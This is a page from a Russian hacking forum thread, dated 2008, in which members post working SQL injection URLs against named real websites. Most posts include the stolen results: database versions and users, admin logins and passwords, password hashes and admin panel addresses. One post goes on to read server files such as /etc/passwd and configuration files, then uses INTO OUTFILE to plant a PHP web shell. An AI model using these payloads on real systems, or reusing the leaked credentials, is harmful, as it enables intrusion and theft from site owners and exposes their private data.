HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 691 из 1602 « Первая < 191591641681 687 688 689 690 691 692 693 694 695 7017417911191 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.12.2008, 21:36
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию
http://hemuspartners.com/ask.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32), version(),user(),database()),7,8,9,10,11,12,13,14--
5.0.67-community - stefanwo_partner@localhost - stefanwo_hemusprt

http://www.computerclinic.on.ca/ask.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard - rarmstrong_usr@localhost - rarmstrong_db

http://www.esqway165.com/faq.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard-log - esqwa206@localhost - esqwa206_phpbb1

http://ppcolonic.com/ask.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7--
5.0.41-community-log - ppcolonic_pspg@localhost - ppcolonic_db
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось masternet; 07.12.2008 в 22:08..
 
Ответить с цитированием

  #2  
Старый 07.12.2008, 21:44
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами: 9507243

Репутация: 37
По умолчанию
www.harlemstage.org
Цитата:
http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,user(),database(),version(),6--
Version: 5.0.67-log
User: harlem_5@209.68.4.232
Database: harlem_live
Последний раз редактировалось Thrasher88; 07.12.2008 в 22:02..
 
Ответить с цитированием

  #3  
Старый 07.12.2008, 22:34
d1aVOL
Познающий
Регистрация: 29.07.2007
Сообщений: 49
С нами: 9888070

Репутация: 7
По умолчанию
Цитата:
sql: http://www.southworth.com/page.php?id=-1+union+select+password+from+users--
вытащил:
kelly;meex
Maryann;Meeks

но...не подходит.
админка http://www.southworth.com/manage
 
Ответить с цитированием

  #4  
Старый 07.12.2008, 22:51
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию
Код:
http://www.thebiggreen.net/article.php?id=952+and+1=0+union+select+1,@@version,3,4,5,6,7,8,9,10,11--
Код:
http://www.mediatunisie.com/news-web-sites-tunis-tunisia.php?id=-6+union+select+1,version(),3,4/*
Код:
http://www.sitecom.com/reviews_view.php?review=Disk+ID+-+LN-117+Disk+ID+5+stars&reviewitem=null union all select 1,2,3,4,5,6,7,8,9,10--
Код:
http://www.e-maximfashion.com/news.php?news_id=-2%20union%20all%20select%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10%20from%20admin%20--
Цитата:
user: admin pass: emax2006
Цитата:
Админка- http://www.e-maximfashion.com/admin/
Код:
http://www.meshop.ws/detail.php?id=-2+union+select+1,2,3,concat(user,0x3e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--
 
Ответить с цитированием

  #5  
Старый 07.12.2008, 23:10
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
d1aVOL
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,user,passw ord)))+from+mysql.user--
root
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/passwd%27)))+from+mysql.user+limit+0,1--
кавычки не фильтрует
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/httpd/conf/httpd.conf%27)))+from+mysql.user+limit+0,1--
узнаем пути и сайты на сервере )
Цитата:
<VirtualHost 72.3.131.57:80>
DocumentRoot /var/www/html
ServerName southworth.com
ServerAlias www.southworth.com ...
<Directory "/var/www/html">
allow from all
Options +Indexes
</Directory>
LogLevel emerg
CustomLog /var/log/httpd/sw_access_log combined
</VirtualHost>
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/bsinclude.inc%27)))+from+mysql.user+limit+0,1--
смотрим конфиг админки
Цитата:
$bshostname="localhost";
$bsusername="swdata";
$bspassword="dataB88";
$bsdatabase="southworthbs";
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/.htpasswd%27)))+from+mysql.user+limit+0,1--
ну и самое главное пароли к админке:
Цитата:
cservice:12gesqQWYvu66
sieraci:70X9knvrU05jc
southworth:WjEHl7rauDQhc
что за хеш?
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+%27vital evil php%27+into+outfile+%27/var/www/html/images/main2/_notes/s.php%27--
ну и конешно залитие шелла ) токо папку на запись остается наити тебе )

усе успешного вам хека!
Последний раз редактировалось sabe; 08.12.2008 в 00:20..
 
Ответить с цитированием

  #6  
Старый 08.12.2008, 02:25
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,version(),3,4,5,6%60

http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,unhex(hex(GROUP_CONCAT(user_ name,0x3A,password))),3,4,5,6+from+adm_users%60

Версия MySQL:
5.0.58
-------
Имя базы:
traveleurope
-------
Юзер:
fiere@192.168.1.170
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------
mysql user:
srv1
-------
mysql password:
6f14f6e867cffa2c
Последний раз редактировалось Pashkela; 08.12.2008 в 04:28..
 
Ответить с цитированием

  #7  
Старый 08.12.2008, 12:34
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию
http://www.liberte-economie.com/edit.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13--
5.0.51a-log - economie_base@localhost - economie
 
Ответить с цитированием

  #8  
Старый 08.12.2008, 13:22
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию
facebook.com

Код:
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4--
Version: 5.0.67-community
 
Ответить с цитированием

  #9  
Старый 08.12.2008, 13:51
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию
Цитата:
Сообщение от SWAT  
facebook.com

Код:
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4--
Version: 5.0.67-community
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,user name,2,3,password%20from%20users%20limit%201,1
Хмм.. это не сам facebook..
http://affinispace.com/facebook/
 
Ответить с цитированием

  #10  
Старый 08.12.2008, 16:31
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию
http://www.soulmenace.com


Код:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,3,4,5,6,7--
Версия оказалась 4.0.27-standard и пришлось подбирать вручную.
Нашел таблицу prarez_soul.user, в ней подобрал имена: username и password. Вытащил логин с пассом:

Код:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,concat_ws(username,0x3a,password),4,5,6,7+from+prarez_soul.user--
prarez : djbamix

вход:
Код:
http://www.soulmenace.com/login.php
 
Ответить с цитированием
Ответ
Страница 691 из 1602 « Первая < 191591641681 687 688 689 690 691 692 693 694 695 7017417911191 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.